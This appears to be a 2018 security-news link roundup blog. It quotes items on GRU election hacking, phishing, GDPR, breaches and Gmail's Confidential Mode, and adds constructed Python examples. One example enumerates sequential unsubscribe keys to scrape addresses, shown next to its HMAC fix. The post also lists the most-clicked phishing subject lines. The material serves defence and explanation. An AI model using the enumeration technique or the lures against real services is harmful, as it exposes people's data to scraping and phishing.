How they did it (and will likely try again): GRU hackers vs. US elections

In a press briefing just two weeks ago, Deputy
Attorney General Rod Rosenstein announced that the grand jury
assembled by Special Counsel Robert Mueller had returned an
indictment

… The filing
[PDF] spells out the Justice Department's first official, public
accounting

… The allegations are backed up by data
collected from service provider logs, Bitcoin transaction tracing,
and additional forensics. The DOJ also relied on information
collected by US (and likely foreign) intelligence and law enforcement
agencies.

… After digging into this latest indictment,
the evidence suggests Trump may not have made a very good call on
this matter. But his blaming of the victims of the attacks for
failing to have good enough security, while misguided, does strike on
a certain truth: the Clinton campaign, the DNC, and DCCC were poorly
prepared for this sort of attack, failed to learn lessons from
history, and ignored advice from some very knowledgeable third
parties they enlisted for help.

… The GRU operation had conducted wide-ranging
spear-phishing attacks against both Democrats and Republicans as far
back as October 2015 with limited success. Members of John McCain's
and Lindsey Graham's campaign staffs, as well as members of several
other Republican congressional campaign staffs, had
their emails stolen and later posted on the DCLeaks site. But as
the presidential field narrowed, the GRU began to focus on the
Democrats and Hillary Clinton's campaign.

… Unfortunately, few if any members of the
Clinton campaign staff, DNC, or DCCC used two-factor
authentication—despite advice from outside advisors

(Related) The government hasn’t realized how
important Computer Security is. They still consider IT as
unimportant to the strategic success of the organization (like
janitorial services). The results are similar to the failures of
ignorant politicians.

The nation’s cyber spy agency is suffering from
substantial cyber vulnerabilities, according to a first-of-its-kind
unclassified audit overview from the agency’s inspector general
released Wednesday.

Those vulnerabilities include computer system
security plans that are inaccurate or incomplete, removable media
that aren’t properly scanned for viruses, and an inadequate process
for tracking the job duties of National Security Agency cyber
defenders to ensure they’re qualified for the highest-level work
they do, according to the
overview.

Perhaps most striking, the agency has not properly
implemented “two-person access controls” on its data centers and
equipment rooms.

State Govts. Warned of Malware-Laden CD Sent Via Snail Mail from China

Here’s a timely reminder that email isn’t the
only vector for phishing attacks: Several U.S. state and local
government agencies have reported receiving strange letters via snail
mail that include malware-laden compact discs (CDs) apparently sent
from China, KrebsOnSecurity has learned.

This particular ruse, while crude and simplistic,
preys on the curiosity of recipients who may be enticed into popping
the CD into a computer. According to a non-public alert shared with
state and local government agencies by the Multi-State
Information Sharing and Analysis Center (MS-ISAC), the scam
arrives in a Chinese postmarked envelope and includes a “confusingly
worded typed letter with occasional Chinese characters.”

British regulators should be given more control
over Facebook and Google to stop the spread of “fake news” —
including the power to audit their jealously-guarded algorithms —
an influential parliamentary committee will recommend.

The interim report from the House of Commons
Digital, Culture, Media and Sport Committee is due to be published on
Sunday, but on Friday afternoon a leaked copy was published in full
online by former Vote Leave campaign strategist Dominic Cummings.

Friday, July 27, 2018

School for hackers? I’d hazard a guess that
this did not take much skill to do. Once one inmate figured it out,
he could just email instructions to all his friends. No indication
how long this has been going on.

The hand-held computer tablets are popular in
prisons across the country, and they are made available to Idaho
inmates through a contract with CenturyLink and JPay. Neither
company immediately responded to a request for comment from The
Associated Press.

The tablets allow inmates to email their families
and friends, purchase and listen to music or play simple electronic
games.

The inmates were “intentionally exploiting a
vulnerability within JPay to improperly increase their JPay account
balances,” Ray said in a prepared statement on Thursday. He said
50 inmates credited their accounts in amounts exceeding $1,000; the
largest amount credited by a single inmate was just under $10,000.

The total amount was nearly $225,000.

“This conduct was intentional, not accidental.
It required a knowledge of the JPay system and multiple actions by
every inmate who exploited the system’s vulnerability to improperly
credit their account,” Ray said in a prepared statement.

Leveraging a key human trait that machines would
not fall for, cybercriminals can easily manipulate or fool humans
using social engineering tactics. A new study on the most effective
phishing scams shows that, ironically, the subject
lines relating to security are most likely to trick users
into handling their credentials insecurely.

“By playing into a person’s psyche to either
feel wanted or alarmed, hackers continue to use email as a successful
entry point for an attack,” according to KnowBe4,
which deals with security awareness and simulated phishing.

… After examining tens of thousands of subject
lines, including some “in-the-wild” emails, researchers compiled
the following “Top 10 Most-Clicked General Email Subject Lines
Globally for Q2 2018” (frequency percentage in brackets):

Password Check Required Immediately (15%)
Security Alert (12%)
Change of Password Required Immediately (11%)
A Delivery Attempt was made (10%)
Urgent press release to all employees (10%)
De-activation of [[email]] in Process (10%)
Revised Vacation & Sick Time Policy (9%)
UPS Label Delivery, 1ZBE312TNY00015011 (9%)
Staff Review 2017 (7%)
Company Policies-Updates to our Fraternization Policy (7%)

We haven’t heard much about the Exactis data
breach, but Troy Hunt pointed me to this record layout.

Twitter Inc on Friday reported fewer monthly
active users than analysts expected and warned that the
closely-watched figure could
keep falling as it deletes phony accounts, sending shares
sharply lower in early trading.

The company said the work it was doing to clean up
Twitter by purging automated and spam accounts had some impact on its
user metrics in the second quarter, and that it would prioritize work
to improve suspicious accounts and reduce hate speech and other
abusive content over projects that could attract more users.

The clash of technologies? Requires a thoughtful
architecture to avoid disaster.

Blockchain technology has the potential to
revolutionise many industries; it has been said that “blockchain
will do to the financial system what the internet did to media”.
Its most famous use is its role as the architecture of the
cryptocurrency Bitcoin, however it has many other potential uses in
the financial sector, for instance in trading, clearing and
settlement, as well as various middle- and back-office functions.

… in order for the technology to unfold its
full potential there needs to be careful consideration as to how the
technology can comply with new European privacy legislation, namely
the General Data Protection Regulation (the “GDPR”) which came
into force on 25 May 2018. This article explores some of the
possible or “perceived” challenges blockchain technology
faces when it comes to compliance with the GDPR.

… One of the most widely perceived challenges
of blockchain and the GDPR is the inability to delete data. The main
benefit of blockchain technology is that the blocks in the chain
cannot be deleted or modified, to ensure the security and accuracy of
the record. However, under the GDPR, data subjects have the right to
rectification, where the personal data concerning them is inaccurate,
and they may have the right to have their data erased (“right to be
forgotten”).

Law Technology Today: “Is your staff using analytics,
blockchain and OCR yet? Corporations are ever-focused
on their legal spend and demand more value from their outside
counsel. Further disrupting the legal field are alternative legal
service providers fueling the competitive landscape to become more
crowded and innovative. As a result, Thomson Reuters’ 2018 Report
on the State of the Legal Market surmised that declining profit
margins, weakening collections, falling productivity, and loss of
market share to alternative legal service providers are chipping away
at the foundations of firm profitability. To counteract these market
pressures and to differentiate themselves from competitors, law firms
are embracing technology to improve operational efficiencies and
transform the way attorneys and their firms interact with clients,
answer their questions, and tackle their legal challenges. The law
firms that embrace technology as a means to provide more
cost-effective services to their clients will have a competitive
advantage. For example, digitization and automation technologies
have emerged that streamline internal processes and reduce workloads,
so lawyers can spend more time advising clients and less time with
administrative work…”

… Amazon does not break out financials for
advertising and lumps it into the “Other” category, which
“primarily includes sales of advertising services, as well as sales
related to our other service offerings,” according to financial
statements.

… Amazon
has become a formidable e-commerce search engine, competing with
Google to be the first place where shoppers start when they want to
buy products online. Its growing advertising business is another
example of the battle between Amazon and Alphabet-owned Google, which
compete across a number of areas such as voice technology, cloud
computing, and online shopping.

At least a dozen companies and government agencies
have been targeted and thousands more are exposed to data breaches by
hackers exploiting old security flaws in management software, two
cyber security firms said in a study published on Wednesday.

Systems at two government agencies and at firms in
the media, energy and finance sectors were
hit after failing to install patches or take other security measures
advised by Oracle or SAP, security firms Onapsis and
Digital Shadows said in the newly published report. (goo.gl/pWbz3Q)

When the “protectors” compromise your data…
Think of ‘unsubscribe’ as a GDPR ‘opt-out.’

LifeLock's identity theft protection service
suffered
from a security flaw that put users' identities in jeopardy. The
event forced its parent company, Symantec,
to pull its website down to fix the issue after it was notified by
KrebsOnSecurity. According to Krebs, Atlanta-based security
researcher Nathan Reese discovered the vulnerability through a
newsletter email he received from the service. Upon
clicking "unsubscribe," a page that clearly showed his
subscriber key popped up. That allowed Reese to write a
script that sequences numbers, which was able to pull keys and their
corresponding email addresses from the service.
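A constructed illustration of the flaw Krebs describes and of the usual fix, written for this post rather than taken from LifeLock or from Reese's script; the subscriber table, the addresses and the server secret are all made up. The vulnerable endpoint accepts a bare sequential key, so one loop walks the whole subscriber base; the hardened endpoint issues links that carry the id plus a keyed MAC over it, so a guessed id on its own returns nothing:

```python
"""Sequential unsubscribe keys vs. signed tokens (constructed demo)."""
import hashlib
import hmac
import secrets

# Constructed subscriber table. The integer keys stand in for the
# sequential subscriber keys the article describes; the addresses are
# made up.
SUBSCRIBERS = {
    1001: "alice@example.com",
    1002: "bob@example.com",
    1003: "carol@example.com",
}

# Assumed to live in a secrets store in a real deployment; generated per
# process here so the demo is self-contained.
SERVER_SECRET = secrets.token_bytes(32)


def vulnerable_lookup(key: int):
    """The flawed pattern: the unsubscribe endpoint trusts a bare sequential key."""
    return SUBSCRIBERS.get(key)


def enumerate_sequential(start: int, stop: int) -> dict:
    """What a one-loop script gets from the vulnerable endpoint: keys and addresses."""
    found = {}
    for key in range(start, stop):
        email = vulnerable_lookup(key)
        if email is not None:
            found[key] = email
    return found


def _mac(subscriber_id: int) -> str:
    return hmac.new(SERVER_SECRET, str(subscriber_id).encode(), hashlib.sha256).hexdigest()


def issue_token(subscriber_id: int) -> str:
    """Hardened pattern: the link carries the id plus a keyed MAC over it.
    Guessing the next id is easy; forging its MAC without SERVER_SECRET is not."""
    return f"{subscriber_id}.{_mac(subscriber_id)}"


def hardened_lookup(token: str):
    """Verify the MAC in constant time before touching the subscriber table.
    Returns the address to the caller only; the page itself should not echo it."""
    try:
        sid_text, mac = token.split(".", 1)
        subscriber_id = int(sid_text)
    except ValueError:
        return None
    if not hmac.compare_digest(mac, _mac(subscriber_id)):
        return None
    return SUBSCRIBERS.get(subscriber_id)


def enumerate_hardened(start: int, stop: int) -> dict:
    """The same loop against the hardened endpoint with a guessed MAC: nothing comes back."""
    found = {}
    for sid in range(start, stop):
        email = hardened_lookup(f"{sid}.{'0' * 64}")
        if email is not None:
            found[sid] = email
    return found


if __name__ == "__main__":
    print("vulnerable:", enumerate_sequential(1000, 1010))
    print("hardened:  ", enumerate_hardened(1000, 1010))
    print("valid link:", hardened_lookup(issue_token(1002)))
```

A random per-subscriber token stored alongside the record works just as well; the MAC form only saves a column. Whichever you use, rate-limit the endpoint and have the unsubscribe page confirm the action without echoing the key or the address back, since the pairing of a guessable key with an echoed address is what turned the LifeLock page into a directory.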

… GDPR imposes a number of new requirements on
organizations that handle personal information. But one of the
biggest changes is that organizations must track all breaches, as
well as report certain types of breaches to authorities "within
72 hours of becoming aware of the breach, where feasible,"
according to the Information
Commissioner's Office, which is the U.K.'s data privacy watchdog
and GDPR enforcer

… But the data does not reveal whether
organizations are suffering more - or fewer - breaches than before.
"It's important to note that while the number of reported
breaches has increased, it does not necessarily mean the number of
breaches has increased – just that more are being reported,"
says Brian Honan, who heads cybersecurity consultancy BH Consulting
in Dublin, and who moderated a panel focused on complying with GDPR at
the June Infosecurity Europe conference in London.

The biggest impact GDPR will have on organizations
is the right to be forgotten. Organizations are required to allow EU
residents to revoke their consent at any point. This means that all
that data must be removed from every system within the organization.
Unless all their databases are integrated, this could get tricky.

8. The IP Address As Personal Data

One of the key tenets of cybersecurity operations
is tracking indicators of compromise: Pieces of identifying
information that tip off whether user or network activity is
malicious. With GDPR in effect, IOCs such as a user's IP address are
considered personal data, impacting the defenders' ability to fully
use that data to identify, detect and respond to threats.
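One way SOC tooling can keep working under that constraint: pseudonymise the address fields with a keyed HMAC at ingest, and pseudonymise the IOC list with the same key at hunt time, so matching still happens on the stored form. This is an added example for this post, not code from any vendor or from the article; the key, the log lines and the IOC list are constructed.

```python
"""Keyed pseudonymisation of IPs in retained logs, with IOC matching on the pseudonyms."""
import hashlib
import hmac
import ipaddress

# Constructed key. In practice it sits in the SOC's secrets store and is
# rotated on the retention schedule; old pseudonyms then stop being linkable.
KEY = b"constructed-demo-key-rotate-me"

# Constructed log lines (documentation ranges 198.51.100.0/24 and 203.0.113.0/24).
SAMPLE_LOG = [
    "2018-07-25T10:00:01Z src=198.51.100.7 dst=10.0.0.5 action=allow",
    "2018-07-25T10:00:02Z src=203.0.113.9 dst=10.0.0.5 action=allow",
    "2018-07-25T10:00:03Z src=10.0.0.5 dst=198.51.100.7 action=deny",
]

# Constructed threat-intel list.
IOC_IPS = ["198.51.100.7", "192.0.2.44"]

IP_FIELDS = ("src", "dst")


def pseudonymize_ip(ip: str, key: bytes = KEY) -> str:
    """HMAC, not a bare hash: the IPv4 space is small enough that an unkeyed
    hash is reversed by hashing all 2^32 addresses. Parsing first means
    '2001:db8::1' and its long form map to the same pseudonym."""
    packed = ipaddress.ip_address(ip).packed
    return hmac.new(key, packed, hashlib.sha256).hexdigest()[:24]


def pseudonymize_line(line: str, key: bytes = KEY) -> str:
    """Ingest step: what gets written to long-term storage."""
    out = []
    for part in line.split():
        name, sep, value = part.partition("=")
        if sep and name in IP_FIELDS:
            part = f"{name}={pseudonymize_ip(value, key)}"
        out.append(part)
    return " ".join(out)


def build_ioc_index(ioc_ips, key: bytes = KEY) -> dict:
    """Hunt step: pseudonymise the IOC list with the same key so it can be
    matched against stored lines without un-pseudonymising anything."""
    return {pseudonymize_ip(ip, key): ip for ip in ioc_ips}


def match_iocs(retained_lines, ioc_index) -> list:
    """Return (timestamp, field, IOC) for every stored address that is on the list."""
    hits = []
    for line in retained_lines:
        parts = line.split()
        for part in parts[1:]:
            name, sep, value = part.partition("=")
            if sep and name in IP_FIELDS and value in ioc_index:
                hits.append((parts[0], name, ioc_index[value]))
    return hits


if __name__ == "__main__":
    retained = [pseudonymize_line(line) for line in SAMPLE_LOG]
    for line in retained:
        print(line)
    print(match_iocs(retained, build_ioc_index(IOC_IPS)))
```

The keyed form is the point: an unkeyed hash of an IPv4 address is reversed by hashing all four billion candidates. What you give up is the ability to act on the raw address from the stored copy, so the usual arrangement is a short-retention tier that keeps raw IPs for live response, relying on the regulation's own recognition of network security as a legitimate interest, and the pseudonymised form for anything kept longer.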

9. Third-Party Data Policy

All third-party scripts like social media
plug-ins, advertising and analytics scripts are your responsibility.
How they handle your users' data can be a liability. You cannot
assume these third-party companies are GDPR compliant just yet.
Review your third-party service providers’ security, and consider
removing most external third-party scripts until you can ensure they
are GDPR compliant.

I immediately thought this meant that the
remaining 507 members of congress were correctly matched to mugshots.
Perhaps they didn’t gather enough mugshots?

Wednesday, July 25, 2018

Recent reports of a newly detected Smoke Loader infection campaign and the re-emergence of Magecart-based cyber-attacks illustrate a common tactic used by cyber criminals and state-sponsored attackers alike ― credential harvesting. According to the Verizon 2017 Data Breach Investigation Report, 81% of hacking-related breaches leverage either stolen, default, or weak credentials. While credential harvesting is often seen as equivalent to phishing, it uses different tactics.

Cyber attackers long ago figured out that the easiest way for them to gain
access to sensitive data is by compromising an end user’s identity
and credentials. Betting on the human factor and attacking the
weakest link in the cyber defense chain, credential harvesting has
become the foundation of most cyber-attacks.

… In the case of cloned websites, the victim is often unaware of the
attack, since the fake web designs are often very authentic. When
the user enters his or her credentials, the page not only captures
them but then forwards them to the actual login page, which then logs
in the user. The victim never even knows their credentials were
stolen.

Low-Hanging Fruit: Responding to the Digital Evidence Challenge in Law Enforcement

Whether you believe law enforcement is “going
dark” or we are in a “golden age of surveillance,” law
enforcement faces serious challenges in identifying and accessing
digital evidence that is available and important to their criminal
investigations. Some of these problems are, no doubt, related to
encryption and ephemerality of data – the two issues that have
absorbed most of the national attention to date. But, in fact, the
problems with digital evidence and digital technologies go far beyond
those issues, as we detail in a new CSIS-issued report released today, Low-Hanging Fruit: Evidence Based Solutions to the Digital Evidence Challenge. (See also coverage of the report at the Washington Post.)

… We found that difficulties accessing and
utilizing digital evidence affect
more than a third of law enforcement cases – a
percentage that we expect only to grow over time absent national
attention to the issue.

Analytic thinking was associated with ability to discern between fake and real.

We found no evidence that analytic thinking
exacerbates motivated reasoning.

“Falling for fake news is more a result of a
lack of thinking than partisanship. Why do people believe blatantly
inaccurate news headlines (“fake news”)? Do we use our reasoning
abilities to convince ourselves that statements that align with our
ideology are true, or does reasoning allow us to effectively
differentiate fake from real regardless of political ideology? Here
we test these competing accounts in two studies (total N = 3446
Mechanical Turk workers) by using the Cognitive Reflection Test (CRT)
as a measure of the propensity to engage in analytical reasoning. We
find that CRT performance is negatively correlated with the perceived
accuracy of fake news, and positively correlated with the ability to
discern fake news from real news – even for headlines that align
with individuals’ political ideology. Moreover, overall
discernment was actually better for ideologically aligned headlines
than for misaligned headlines. Finally, a headline-level analysis
finds that CRT is negatively correlated with perceived accuracy of
relatively implausible (primarily fake) headlines, and positively
correlated with perceived accuracy of relatively plausible (primarily
real) headlines. In contrast, the correlation between CRT and
perceived accuracy is unrelated to how closely the headline aligns
with the participant’s ideology. Thus, we conclude that analytic
thinking is used to assess the plausibility of headlines, regardless
of whether the stories are consistent or inconsistent with one’s
political ideology. Our findings therefore suggest that
susceptibility to fake news is driven more by lazy thinking than it
is by partisan bias per se – a finding that opens potential avenues
for fighting fake news.”

Facebook’s departing chief information security
officer Alex Stamos, whose upcoming exit has been known
for months, wrote a note to staff in March amid the Cambridge
Analytica data-sharing scandal urging them to reconsider the site’s
approach to privacy, BuzzFeed
News reported on Tuesday.

In his note titled “A Difficult Week,” Stamos
wrote that the scandal—in which Facebook’s reckless approach to
sharing data on users allowed the sketchy political firm to acquire
data on somewhere
around 87 million users—as well as others such as alleged
Russian information warfare on the site were the result of “tens of
thousands of small decisions made over the last decade.” Per
BuzzFeed, he also implored his colleagues to please, for the love of
god, consider negative feedback when implementing features that
pushed the limits of users’ comfort levels, as well as limit its
data collection to that actually necessary for the company’s
functioning:

“We need to build a user experience
that conveys honesty and respect, not one optimized to get people to
click yes to giving us more access,” Stamos wrote. “We need to
intentionally not collect data where possible, and to keep it only as
long as we are using it to serve people.”

“We need to listen to people (including
internally) when they tell us a feature is creepy or point out a
negative impact we are having in the world,” the note continued.
“We need to deprioritize short-term growth and revenue and to
explain to Wall Street why that is ok. We need to be willing to pick
sides when there are clear moral or humanitarian issues. And we need
to be open, honest and transparent about our challenges and what we
are doing to fix them.”

Perspective. What are auto manufacturers doing to
transition to the “self-driving/rides on demand” future?

Ford Motor Co (F.N)
said on Tuesday it was creating a separate $4 billion unit to house
its self-driving vehicle operations and is seeking outside investors,
following a similar move in late May by Detroit rival General Motors
Co (GM.N)
with its Cruise Automation unit.

Cable providers have been wringing
their hands and pulling out deal
after deal to try to keep cable TV subscribers. Most
recently, they started bundling Netflix subscriptions with cable
packages (because bundling
is totally something customers don't hate at all).

But a new report from eMarketer
shows that their tactics aren't panning out. Not only is the rate of
TV watchers opting for Over
The Top (OTT) service on the rise — where they just watch
internet TV providers like Netflix, instead of paying for cable —
it's also accelerating faster than projected growth rates.

Projections put the number of cord cutters —
adults who cancel pay TV, opting instead for OTT — at 33 million,
which is 32.8 percent of TV watchers.

… The growth rates of the OTT providers tell
the other side of the story. Netflix
reached 100 million subscribers in 2017. Leaked documents from
Amazon
showed that it counts 26 million prime members as US viewers. Hulu
garnered a walloping 40 percent growth in subscribers in 2017,
reaching 17 million viewers. It also launched Hulu
Live TV, which is like basic cable via a Hulu subscription —
and is proving to be incredibly
popular. And YouTube and Facebook (via Facebook Watch and IGTV)
are in all-out
war to capture the millions of eyeballs to which they already
have access.

Segway has unveiled its latest creation, and it’s as off-kilter as you’d
expect from the company. Taking the hoverboard trend one step
further, it’s now created the Drift W1, which essentially splits
the board in half and works underneath your shoes. The shoes will
weigh 7.7lbs and have a top speed of 7.5 MPH, with a riding time of
around 45 minutes before needing another charge.

Each pair will also come with a helmet for anyone
trying to figure out how to work these shoes without injury. The
Segway Drift W1 will cost $399 USD and be available during August.
You can find out more information from the brand’s web page.

Hackers used phishing emails to break into a
Virginia bank in two separate cyber intrusions over an eight-month
period, making off with more than $2.4 million total. Now the
financial institution is suing its cybersecurity insurance provider
for refusing to fully cover the losses.

According to a lawsuit filed last month in the
Western District of Virginia, the first heist took place in late May
2016, after an employee at The National Bank of Blacksburg
fell victim to a targeted phishing email.

National Bank said the first breach began
Saturday, May 28, 2016 and continued through the following Monday.
Normally, the bank would be open on a Monday, but that particular
Monday was Memorial
Day, a federal holiday in the United States. The hackers used
hundreds of ATMs across North America to dispense funds from customer
accounts. All told, the perpetrators stole more than $569,000 in
that incident.

… In June of 2016, National Bank implemented
additional security protocols, as recommended by FirstData. These
protocols are known as “velocity
rules” and were put in place to help the bank flag specific
types of repeated transaction patterns that happen within a short
period of time
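What a velocity rule looks like in code, as an added example for this post (it is not FirstData’s rule set, and the thresholds and the withdrawal feed are made up): a sliding per-account window that flags an event when the count, the total amount or the number of distinct machines inside the window exceeds a limit.

```python
"""Velocity rule over a constructed ATM withdrawal feed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed events. The pattern for ACCT-A (one account, many machines,
# minutes apart, late on a holiday-weekend Saturday) is the kind of thing
# these rules exist to catch; ACCT-B is ordinary use.
EVENTS = [
    {"ts": datetime(2016, 5, 28, 9, 0),   "account": "ACCT-B", "atm": "ATM-9", "amount": 200},
    {"ts": datetime(2016, 5, 28, 18, 0),  "account": "ACCT-B", "atm": "ATM-9", "amount": 300},
    {"ts": datetime(2016, 5, 28, 23, 0),  "account": "ACCT-A", "atm": "ATM-1", "amount": 400},
    {"ts": datetime(2016, 5, 28, 23, 5),  "account": "ACCT-A", "atm": "ATM-2", "amount": 400},
    {"ts": datetime(2016, 5, 28, 23, 10), "account": "ACCT-A", "atm": "ATM-3", "amount": 400},
    {"ts": datetime(2016, 5, 28, 23, 15), "account": "ACCT-A", "atm": "ATM-4", "amount": 400},
    {"ts": datetime(2016, 5, 28, 23, 20), "account": "ACCT-A", "atm": "ATM-5", "amount": 400},
]


def velocity_alerts(events, window=timedelta(minutes=30),
                    max_count=3, max_amount=1500, max_atms=3):
    """Slide a per-account window over the feed and flag any event at which
    the account exceeds a count, total-amount or distinct-ATM threshold.
    Thresholds are illustrative, not a processor's defaults."""
    recent = defaultdict(deque)  # account -> events still inside the window
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        q = recent[ev["account"]]
        q.append(ev)
        while ev["ts"] - q[0]["ts"] > window:  # drop events that aged out
            q.popleft()
        reasons = []
        if len(q) > max_count:
            reasons.append(f"count={len(q)}")
        total = sum(e["amount"] for e in q)
        if total > max_amount:
            reasons.append(f"amount={total}")
        atms = {e["atm"] for e in q}
        if len(atms) > max_atms:
            reasons.append(f"atms={len(atms)}")
        if reasons:
            alerts.append({"account": ev["account"], "ts": ev["ts"], "reasons": reasons})
    return alerts


def flagged_accounts(events, **thresholds):
    """Accounts that tripped any rule; the set a fraud desk would hold for review."""
    return {a["account"] for a in velocity_alerts(events, **thresholds)}


if __name__ == "__main__":
    for alert in velocity_alerts(EVENTS):
        print(alert)
```

Run on the sample feed it flags ACCT-A at its fourth and fifth withdrawals and leaves ACCT-B alone. In production the feed is the processor’s real-time authorisation stream and the useful thresholds come from the bank’s own baseline; a rule that only counts events misses a slow drain that stays under the count limit, which is why the amount rule sits beside it.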

But just eight months later — in January 2017
according to the lawsuit — hackers broke in to the bank’s systems
once more, again gaining access to the financial institution’s
systems via a phishing email.

Want to learn more about quantum
computing and how to program in the Q# language? Microsoft just
launched Quantum
Katas, an open source project that does just that by providing
you with tutorials for learning at your own pace. According to
Microsoft, these exercises are based on three learning principles:
Active learning, incremental complexity growth, and feedback.

It seems like voice
interfaces are going to be a big part of the future of computing;
popping up in phones, smart speakers, and even household appliances.
But how useful is this technology for people who don’t communicate
using speech? Are we creating a system that locks out certain users?

These were the questions that
inspired software developer Abhishek Singh
to create a mod that lets Amazon’s Alexa assistant understand some
simple sign language commands. In a video, Singh demonstrates how
the system works. An Amazon Echo is connected to a laptop, with a
webcam (and some back-end machine learning software) decoding Singh’s
gestures in text and speech.

… The actual mod itself
was made with the help of Google’s TensorFlow software,
specifically TensorFlow.js,
which allows users to code machine learning applications in
JavaScript (making it easier to run applications in web browsers).
As with any machine vision software, Singh had to teach his program
to understand visual signals by feeding it training data. He
couldn’t find any datasets for sign language online, and instead
created his own set of basic signals.

The software is just a
proof-of-concept at this point, and is unable to read any signs that
aren’t demoed in the video. But adding more vocabulary is
relatively easy, and Singh says he
plans to open-source the code and write an explanatory blog post for
his work. “By releasing the code people will be able to
download it and build on it further or just be inspired to explore
this problem space,” he tells The Verge.

On Saturday morning Forbes published an
opinion piece by LIU Post economist Panos Mourdoukoutas with the
headline “Amazon Should Replace Local Libraries to Save Taxpayers
Money.” It quickly received enthusiastic backlash from actual
American libraries and their communities.

As of around 10am US eastern time this morning,
the story had nearly 200,000 views, according to a counter on the
page. As of 11am, though, the story’s URL has been down.

Computational Propaganda Research Program – Oxford Internet Institute –
Challenging Truth and Trust: A Global Inventory of Organized Social
Media Manipulation, July 20, 2018: “The manipulation of public
opinion over social media platforms has emerged as a critical threat
to public life. Around the world, a range of government agencies and
political parties are exploiting social media platforms to spread
junk news and disinformation, exercise censorship and control, and
undermine trust in the media, public institutions, and science. At a
time when news consumption is increasingly digital, artificial
intelligence, big data analytics, and “blackbox” algorithms are
being leveraged to challenge truth and trust: the cornerstones of our
democratic society. In 2017, the first Global Cyber Troops inventory
shed light on the global organization of social media manipulation by
government and political party actors. This 2018 report analyses the
new trends of organized media manipulation, and the growing
capacities, strategies and resources that support this phenomenon.
Our key findings are:

We have found evidence of formally organized social media manipulation campaigns in 48 countries, up from 28 countries last year. In each country there is at least one political party or government agency using social media to manipulate public opinion domestically.

Much of this growth comes from countries where political parties are spreading disinformation during elections, or countries where government agencies feel threatened by junk news and foreign interference and are responding by developing their own computational propaganda campaigns in response.

In a fifth of these 48 countries—mostly across the Global South—we found evidence of disinformation campaigns operating over chat applications such as WhatsApp, Telegram and WeChat.

Computational propaganda still involves social media account automation and online commentary teams, but is making increasing use of paid advertisements and search engine optimization on a widening array of Internet platforms.

Social media manipulation is big business. Since 2010, political parties and governments have spent more than half a billion dollars on the research, development, and implementation of psychological operations and public opinion manipulation over social media. In a few countries this includes efforts to counter extremism, but in most countries this involves the spread of junk news and misinformation during elections, military crises, and complex humanitarian disasters…”

Not the most common vector of attack. Consider
why this data might be valuable.

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

… Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

… The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The last few years have seen Apple expanding into
India with the iPhone, but now the company is facing a serious
problem if it doesn’t cater to the demands of the country’s
telecom regulator. The Telecom Regulatory Authority of India (TRAI)
has put new rules in place in an effort to protect mobile users’
privacy and block spam calls and messages. Part of this policy
involves making an app available to every subscriber, but Apple
refuses to allow it on the App Store, ironically, due
to privacy concerns.

The regulator requires that all carriers in India
make TRAI’s “Do Not Disturb” app available for users to
download and install on their device. The app then gives users the
ability to report unsolicited calls and messages. Apple has not
allowed it on their App Store, however, due to the fact that the app
requires access to call history and message logs in order to send
reports to the agency.

While Apple has been butting heads with TRAI for
over a year now, the regulator has moved forward with the policy,
giving all carriers six months to make sure the app can be installed
on every device they offer. Any phones that can’t install the app
after that period will be cut off from the carrier’s network. As
for Android, the app is already available via Google’s
Play Store.

Imagine you’re the president of a European
country. You’re slated to take in 50,000 refugees from the Middle
East this year. Most of them are very religious, while most of your
population is very secular. You want to integrate the newcomers
seamlessly, minimizing the risk of economic malaise or violence, but
you have limited resources. One of your advisers tells you to invest
in the refugees’ education; another says providing jobs is the key;
yet another insists the most important thing is giving the youth
opportunities to socialize with local kids. What do you do?

Well, you make your best guess and hope the policy
you chose works out. But it might not. Even a policy that yielded
great results in another place or time may fail miserably in your
particular country under its present circumstances. If that happens,
you might find yourself wishing you could hit a giant reset button
and run the whole experiment over again, this time choosing a
different policy. But of course, you can’t experiment like that,
not with real people.

NASA has made its raw satellite data widely
available for a long while. Now that it has a
privatization-minded
leader, though, it's looking to make that data more palatable for
the business crowd. The administration has released
a Remote Sensing Toolkit that should make it easier to use
observational satellite info for commercial purposes, including
straightforward business uses as well as conservation and research.
The move consolidates info that used to be scattered across "dozens"
of websites, and helps you search that unified database for helpful
knowledge – you don't have to go to one place for atmospheric
studies and another to learn
about forests.

The kit includes both some ready-to-use tools for
making sense of satellite content as well as the code companies can
use to craft their own tools.

Between
You, Me, and Google: Problems With Gmail's “Confidential Mode”

With Gmail’s new
design rolled
out to more and more users, many have had a chance to try out its
new “Confidential
Mode.” While many of its features sound promising, what
“Confidential Mode” provides isn’t confidentiality. At best,
the new mode might create expectations that it fails to meet around
security and privacy in Gmail.

… With its new Confidential Mode, Google
purports to allow you to restrict how the emails you send can be
viewed and shared: the recipient of your Confidential Mode email will
not be able to forward or print it. You can also set an “expiration
date” at which time the email will be deleted from your recipient’s
inbox, and even require a text message code as an added layer of
security before the email can be viewed.

Unfortunately, each of these “security”
features comes with serious security problems for users.

… It’s important to note at the outset that
because Confidential Mode emails are not end-to-end
encrypted, Google
can see the contents of your messages and has the technical
capability to store them indefinitely, regardless of any “expiration
date” you set. In other words, Confidential Mode provides zero
confidentiality with regard to Google.

The Netflix Security
Intelligence and Response Team (SIRT) announces the release of Diffy
under an Apache 2.0 license. Diffy is a triage tool to help digital
forensics and incident response (DFIR) teams quickly identify
compromised hosts on which to focus their response, during a security
incident on cloud architectures.

… It's called "Diffy" because it
helps a human investigator to identify the differences
between instances
